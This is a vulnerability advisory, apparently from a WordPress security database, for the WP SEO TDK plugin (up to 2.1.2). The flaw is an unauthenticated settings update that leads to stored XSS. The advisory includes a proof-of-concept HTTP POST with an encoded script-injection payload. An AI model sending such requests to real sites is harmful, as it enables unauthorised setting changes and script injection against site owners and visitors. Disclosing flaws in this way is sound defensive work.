WP SEO TDK <= 2.1.2 – Unauthenticated Setting Update to Stored XSS | Plugin Vulnerabilities

Description

The plugin does not have authorisation when updating its settings, and relies on a CSRF check, which unfortunately can be bypassed. As a result, unauthenticated users could update the plugin's settings, which could also lead to Stored XSS issue as some are not escaped

Proof of Concept

POST /wp-admin/admin-ajax.php?page=seo HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

action=seo-update&seo_split=A%22%20autofocus%20onfocus%3dalert(%2fXSS%2f)%2f%2f&_wp_http_referer=https://example.com/wp-admin/admin-ajax.php

Affects Plugins

No known fix

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

21e1432d-f19f-4ffb-ad93-0e48e995dbea

Timeline

Publicly Published

2021-07-20 (about 2 years ago)

Added

2022-05-02 (about 2 years ago)

Last Updated

2022-05-02 (about 2 years ago)

Other

Published

Title

Published

2022-06-06

Title

XCloner < 4.3.6 - Plugin Settings Reset

Published

2023-10-25

Title

Product Recommendation Quiz for eCommerce < 2.1.2 - Missing Authorization in prq_set_token

Published

2024-04-22

Title

Contest Gallery < 21.3.5 - Authenticated (Author+) Arbitrary File Deletion

Published

2024-01-31

Title

NEX-Forms – Ultimate Form Builder – Contact forms and much more < 8.5.7 - Missing Authorization via set_read()

Published

2024-02-14

Title

EventPrime – Events Calendar, Bookings and Tickets < 3.4.1 - Missing Authorization to Authenticated (Subscriber+) Attendee List Retrieval